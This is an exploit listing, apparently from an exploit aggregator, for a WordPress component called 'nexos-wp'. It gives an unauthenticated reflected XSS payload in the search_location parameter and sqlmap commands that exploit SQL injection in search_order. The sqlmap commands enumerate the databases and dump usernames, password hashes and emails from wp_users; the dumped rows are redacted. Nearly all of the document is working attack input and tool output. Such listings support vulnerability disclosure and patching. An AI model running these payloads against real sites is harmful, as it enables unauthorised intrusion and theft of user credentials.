Share
## https://sploitus.com/exploit?id=WPEX-ID:10285
### PoC Unauthenticated Reflected XSS:

https://example.com/nexos-wp/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`XSS`)>

### PoC SQL Injection:

[!] sqlmap --url="https://example.com/nexos-wp/side-map/?search_order=idlisting%20DESC" --dbs  --random-agent --threads 4

[02:23:33] [INFO] the back-end DBMS is MySQL
[02:23:33] [INFO] fetching database names
[02:23:33] [INFO] fetching number of databases
[02:23:33] [INFO] resumed: 2
available databases [2]:
[*] xx_nexos
[*] information_schema

[!] sqlmap --url="https://example.com/nexos-wp/side-map/?search_order=idlisting%20DESC" -D xx_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8

Database: xx_nexos
Table: wp_users
[9 entries]
[REDACTED]